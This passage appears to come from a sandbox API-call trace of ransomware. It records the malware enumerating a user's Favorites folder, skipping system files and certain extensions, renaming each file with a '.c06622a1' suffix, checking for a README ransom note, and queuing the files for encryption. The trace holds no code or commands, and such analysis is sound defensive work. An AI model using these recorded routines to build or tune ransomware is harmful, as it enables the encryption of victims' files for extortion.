(_Str1="dll", _Str2="url") returned -17 [0150.075] wcslen (_String="dll") returned 0x3 [0150.075] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0150.075] wcslen (_String="drv") returned 0x3 [0150.075] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0150.075] wcslen (_String="exe") returned 0x3 [0150.075] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0150.075] wcslen (_String="hlp") returned 0x3 [0150.075] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0150.075] wcslen (_String="icl") returned 0x3 [0150.075] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0150.075] wcslen (_String="icns") returned 0x4 [0150.075] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0150.075] wcslen (_String="ico") returned 0x3 [0150.075] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0150.075] wcslen (_String="ics") returned 0x3 [0150.075] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0150.075] wcslen (_String="idx") returned 0x3 [0150.075] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0150.075] wcslen (_String="ldf") returned 0x3 [0150.075] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0150.075] wcslen (_String="lnk") returned 0x3 [0150.075] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0150.076] wcslen (_String="mod") returned 0x3 [0150.076] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0150.076] wcslen (_String="mpa") returned 0x3 [0150.076] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0150.076] wcslen (_String="msc") returned 0x3 [0150.076] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0150.076] wcslen (_String="msp") returned 0x3 [0150.076] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0150.076] wcslen (_String="msstyles") returned 0x8 [0150.076] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0150.076] wcslen (_String="msu") returned 0x3 [0150.076] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0150.076] wcslen (_String="nls") returned 0x3 [0150.076] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0150.076] wcslen (_String="nomedia") returned 0x7 [0150.076] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0150.076] wcslen (_String="ocx") returned 0x3 [0150.076] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0150.076] wcslen (_String="prf") returned 0x3 [0150.076] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0150.076] wcslen (_String="ps1") returned 0x3 [0150.076] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0150.076] wcslen (_String="rom") returned 0x3 [0150.076] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0150.076] wcslen (_String="rtp") returned 0x3 [0150.076] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0150.076] wcslen (_String="scr") returned 0x3 [0150.076] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0150.076] wcslen (_String="shs") returned 0x3 [0150.076] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0150.076] wcslen (_String="spl") returned 0x3 [0150.076] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0150.076] wcslen (_String="sys") returned 0x3 [0150.076] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0150.076] wcslen (_String="theme") returned 0x5 [0150.076] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0150.076] wcslen (_String="themepack") returned 0x9 [0150.076] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0150.077] wcslen (_String="wpx") returned 0x3 [0150.077] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0150.077] wcslen (_String="lock") returned 0x4 [0150.077] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0150.077] wcslen (_String="key") returned 0x3 [0150.077] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0150.077] wcslen (_String="hta") returned 0x3 [0150.077] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0150.077] wcslen (_String="msi") returned 0x3 [0150.077] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0150.077] wcslen (_String="pdb") returned 0x3 [0150.077] _wcsicmp (_Str1="sql", _Str2="url") returned -2 [0150.077] wcslen (_String="sql") returned 0x3 [0150.077] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0150.077] wcslen (_String="sqlite") returned 0x6 [0150.077] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites")) returned 0x10 [0150.077] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.077] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0150.077] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned 0x3e [0150.077] wcscpy (in: _Dest=0x450010e, _Source="IE Add-on site.url" | out: _Dest="IE Add-on site.url") returned="IE Add-on site.url" [0150.077] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url", dwFileAttributes=0x80) returned 1 [0150.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x620 [0150.077] SetFilePointerEx (in: hFile=0x620, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0150.077] CloseHandle (hObject=0x620) returned 1 [0150.078] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.078] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" [0150.078] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 0x51 [0150.078] wcscpy (in: _Dest=0x451013a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.078] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.c06622a1"), dwFlags=0x8) returned 1 [0150.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x620 [0150.081] CreateIoCompletionPort (FileHandle=0x620, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0150.081] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0150.087] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x27b59d8a [0150.087] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x74d1ae3c [0150.087] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x780ddd61 [0150.087] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1bb42f17 [0150.087] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x758ed919 [0150.087] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x55130d0b [0150.087] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5042f2a7 [0150.087] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1829c006 [0150.090] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0x8834eab8 [0150.090] RtlComputeCrc32 (PartialCrc=0xeab8, Buffer=0x2f30094, Length=0x80) returned 0x687e6412 [0150.090] RtlComputeCrc32 (PartialCrc=0x6412, Buffer=0x2f30094, Length=0x80) returned 0x4ecb6846 [0150.090] RtlComputeCrc32 (PartialCrc=0x6846, Buffer=0x2f30094, Length=0x80) returned 0xbce235a0 [0150.090] RtlComputeCrc32 (PartialCrc=0x35a0, Buffer=0x2f30094, Length=0x80) returned 0x3bf6094f [0150.090] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0150.090] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.090] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.090] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0150.090] _wcsicmp (_Str1="IE site on Microsoft.com.url", _Str2="README.c06622a1.TXT") returned -9 [0150.090] wcsstr (_Str="IE site on Microsoft.com.url", _SubStr="README") returned 0x0 [0150.090] _wcsicmp (_Str1="autorun.inf", _Str2="IE site on Microsoft.com.url") returned -8 [0150.090] wcslen (_String="autorun.inf") returned 0xb [0150.090] _wcsicmp (_Str1="boot.ini", _Str2="IE site on Microsoft.com.url") returned -7 [0150.090] wcslen (_String="boot.ini") returned 0x8 [0150.090] _wcsicmp (_Str1="bootfont.bin", _Str2="IE site on Microsoft.com.url") returned -7 [0150.090] wcslen (_String="bootfont.bin") returned 0xc [0150.090] _wcsicmp (_Str1="bootsect.bak", _Str2="IE site on Microsoft.com.url") returned -7 [0150.090] wcslen (_String="bootsect.bak") returned 0xc [0150.090] _wcsicmp (_Str1="desktop.ini", _Str2="IE site on Microsoft.com.url") returned -5 [0150.090] wcslen (_String="desktop.ini") returned 0xb [0150.090] _wcsicmp (_Str1="iconcache.db", _Str2="IE site on Microsoft.com.url") returned -2 [0150.090] wcslen (_String="iconcache.db") returned 0xc [0150.091] _wcsicmp (_Str1="ntldr", _Str2="IE site on Microsoft.com.url") returned 5 [0150.091] wcslen (_String="ntldr") returned 0x5 [0150.091] _wcsicmp (_Str1="ntuser.dat", _Str2="IE site on Microsoft.com.url") returned 5 [0150.091] wcslen (_String="ntuser.dat") returned 0xa [0150.091] _wcsicmp (_Str1="ntuser.dat.log", _Str2="IE site on Microsoft.com.url") returned 5 [0150.091] wcslen (_String="ntuser.dat.log") returned 0xe [0150.091] _wcsicmp (_Str1="ntuser.ini", _Str2="IE site on Microsoft.com.url") returned 5 [0150.091] wcslen (_String="ntuser.ini") returned 0xa [0150.091] _wcsicmp (_Str1="thumbs.db", _Str2="IE site on Microsoft.com.url") returned 11 [0150.091] wcslen (_String="thumbs.db") returned 0x9 [0150.091] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0150.091] wcslen (_String="386") returned 0x3 [0150.091] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0150.091] wcslen (_String="adv") returned 0x3 [0150.091] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0150.091] wcslen (_String="ani") returned 0x3 [0150.091] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0150.091] wcslen (_String="bat") returned 0x3 [0150.091] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0150.091] wcslen (_String="bin") returned 0x3 [0150.091] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0150.091] wcslen (_String="cab") returned 0x3 [0150.091] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0150.091] wcslen (_String="cmd") returned 0x3 [0150.091] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0150.091] wcslen (_String="com") returned 0x3 [0150.091] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0150.091] wcslen (_String="cpl") returned 0x3 [0150.091] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0150.091] wcslen (_String="cur") returned 0x3 [0150.091] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0150.091] wcslen (_String="deskthemepack") returned 0xd [0150.091] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0150.091] wcslen (_String="diagcab") returned 0x7 [0150.091] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0150.091] wcslen (_String="diagcfg") returned 0x7 [0150.091] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0150.092] wcslen (_String="diagpkg") returned 0x7 [0150.092] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0150.092] wcslen (_String="dll") returned 0x3 [0150.092] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0150.092] wcslen (_String="drv") returned 0x3 [0150.092] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0150.092] wcslen (_String="exe") returned 0x3 [0150.092] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0150.092] wcslen (_String="hlp") returned 0x3 [0150.092] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0150.092] wcslen (_String="icl") returned 0x3 [0150.092] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0150.092] wcslen (_String="icns") returned 0x4 [0150.092] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0150.092] wcslen (_String="ico") returned 0x3 [0150.092] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0150.092] wcslen (_String="ics") returned 0x3 [0150.092] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0150.092] wcslen (_String="idx") returned 0x3 [0150.092] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0150.092] wcslen (_String="ldf") returned 0x3 [0150.092] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0150.092] wcslen (_String="lnk") returned 0x3 [0150.092] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0150.092] wcslen (_String="mod") returned 0x3 [0150.092] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0150.092] wcslen (_String="mpa") returned 0x3 [0150.092] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0150.092] wcslen (_String="msc") returned 0x3 [0150.092] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0150.092] wcslen (_String="msp") returned 0x3 [0150.092] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0150.092] wcslen (_String="msstyles") returned 0x8 [0150.092] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0150.092] wcslen (_String="msu") returned 0x3 [0150.092] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0150.092] wcslen (_String="nls") returned 0x3 [0150.093] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0150.093] wcslen (_String="nomedia") returned 0x7 [0150.093] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0150.093] wcslen (_String="ocx") returned 0x3 [0150.093] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0150.093] wcslen (_String="prf") returned 0x3 [0150.093] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0150.093] wcslen (_String="ps1") returned 0x3 [0150.093] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0150.093] wcslen (_String="rom") returned 0x3 [0150.093] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0150.093] wcslen (_String="rtp") returned 0x3 [0150.093] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0150.093] wcslen (_String="scr") returned 0x3 [0150.093] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0150.093] wcslen (_String="shs") returned 0x3 [0150.093] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0150.093] wcslen (_String="spl") returned 0x3 [0150.093] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0150.093] wcslen (_String="sys") returned 0x3 [0150.093] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0150.093] wcslen (_String="theme") returned 0x5 [0150.093] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0150.093] wcslen (_String="themepack") returned 0x9 [0150.093] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0150.093] wcslen (_String="wpx") returned 0x3 [0150.093] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0150.093] wcslen (_String="lock") returned 0x4 [0150.093] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0150.093] wcslen (_String="key") returned 0x3 [0150.093] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0150.093] wcslen (_String="hta") returned 0x3 [0150.093] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0150.093] wcslen (_String="msi") returned 0x3 [0150.093] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0150.093] wcslen (_String="pdb") returned 0x3 [0150.093] _wcsicmp (_Str1="sql", _Str2="url") returned -2 [0150.094] wcslen (_String="sql") returned 0x3 [0150.094] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0150.094] wcslen (_String="sqlite") returned 0x6 [0150.094] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites")) returned 0x10 [0150.094] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.094] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0150.094] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned 0x3e [0150.094] wcscpy (in: _Dest=0x450010e, _Source="IE site on Microsoft.com.url" | out: _Dest="IE site on Microsoft.com.url") returned="IE site on Microsoft.com.url" [0150.094] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", dwFileAttributes=0x80) returned 1 [0150.094] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x67c [0150.094] SetFilePointerEx (in: hFile=0x67c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0150.094] CloseHandle (hObject=0x67c) returned 1 [0150.094] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.094] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" [0150.094] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 0x5b [0150.094] wcscpy (in: _Dest=0x451014e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.094] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.c06622a1"), dwFlags=0x8) returned 1 [0150.097] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x67c [0150.097] CreateIoCompletionPort (FileHandle=0x67c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.097] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0150.103] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x792ce6e4 [0150.104] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x32282c0c [0150.104] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x76c21642 [0150.104] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1a591242 [0150.104] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x66853b42 [0150.104] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x139e3c1a [0150.104] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7ad7c3aa [0150.104] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x36a3d4ca [0150.107] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0xa0c750bc [0150.107] RtlComputeCrc32 (PartialCrc=0x50bc, Buffer=0x41f0094, Length=0x80) returned 0x5e0103ee [0150.107] RtlComputeCrc32 (PartialCrc=0x3ee, Buffer=0x41f0094, Length=0x80) returned 0xc4e4f4d5 [0150.107] RtlComputeCrc32 (PartialCrc=0xf4d5, Buffer=0x41f0094, Length=0x80) returned 0x68c1db69 [0150.107] RtlComputeCrc32 (PartialCrc=0xdb69, Buffer=0x41f0094, Length=0x80) returned 0x3b95c063 [0150.107] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0150.107] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.107] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.107] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0150.107] _wcsicmp (_Str1="Microsoft At Home.url", _Str2="README.c06622a1.TXT") returned -5 [0150.107] wcsstr (_Str="Microsoft At Home.url", _SubStr="README") returned 0x0 [0150.107] _wcsicmp (_Str1="autorun.inf", _Str2="Microsoft At Home.url") returned -12 [0150.107] wcslen (_String="autorun.inf") returned 0xb [0150.107] _wcsicmp (_Str1="boot.ini", _Str2="Microsoft At Home.url") returned -11 [0150.107] wcslen (_String="boot.ini") returned 0x8 [0150.107] _wcsicmp (_Str1="bootfont.bin", _Str2="Microsoft At Home.url") returned -11 [0150.107] wcslen (_String="bootfont.bin") returned 0xc [0150.107] _wcsicmp (_Str1="bootsect.bak", _Str2="Microsoft At Home.url") returned -11 [0150.107] wcslen (_String="bootsect.bak") returned 0xc [0150.107] _wcsicmp (_Str1="desktop.ini", _Str2="Microsoft At Home.url") returned -9 [0150.107] wcslen (_String="desktop.ini") returned 0xb [0150.107] _wcsicmp (_Str1="iconcache.db", _Str2="Microsoft At Home.url") returned -4 [0150.107] wcslen (_String="iconcache.db") returned 0xc [0150.107] _wcsicmp (_Str1="ntldr", _Str2="Microsoft At Home.url") returned 1 [0150.107] wcslen (_String="ntldr") returned 0x5 [0150.107] _wcsicmp (_Str1="ntuser.dat", _Str2="Microsoft At Home.url") returned 1 [0150.107] wcslen (_String="ntuser.dat") returned 0xa [0150.108] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Microsoft At Home.url") returned 1 [0150.108] wcslen (_String="ntuser.dat.log") returned 0xe [0150.108] _wcsicmp (_Str1="ntuser.ini", _Str2="Microsoft At Home.url") returned 1 [0150.108] wcslen (_String="ntuser.ini") returned 0xa [0150.108] _wcsicmp (_Str1="thumbs.db", _Str2="Microsoft At Home.url") returned 7 [0150.108] wcslen (_String="thumbs.db") returned 0x9 [0150.108] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0150.108] wcslen (_String="386") returned 0x3 [0150.108] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0150.108] wcslen (_String="adv") returned 0x3 [0150.108] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0150.108] wcslen (_String="ani") returned 0x3 [0150.108] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0150.108] wcslen (_String="bat") returned 0x3 [0150.108] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0150.108] wcslen (_String="bin") returned 0x3 [0150.108] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0150.108] wcslen (_String="cab") returned 0x3 [0150.108] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0150.108] wcslen (_String="cmd") returned 0x3 [0150.108] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0150.108] wcslen (_String="com") returned 0x3 [0150.108] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0150.108] wcslen (_String="cpl") returned 0x3 [0150.108] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0150.108] wcslen (_String="cur") returned 0x3 [0150.108] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0150.108] wcslen (_String="deskthemepack") returned 0xd [0150.108] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0150.108] wcslen (_String="diagcab") returned 0x7 [0150.108] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0150.108] wcslen (_String="diagcfg") returned 0x7 [0150.108] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0150.108] wcslen (_String="diagpkg") returned 0x7 [0150.108] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0150.108] wcslen (_String="dll") returned 0x3 [0150.109] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0150.109] wcslen (_String="drv") returned 0x3 [0150.109] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0150.109] wcslen (_String="exe") returned 0x3 [0150.109] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0150.109] wcslen (_String="hlp") returned 0x3 [0150.109] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0150.109] wcslen (_String="icl") returned 0x3 [0150.109] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0150.109] wcslen 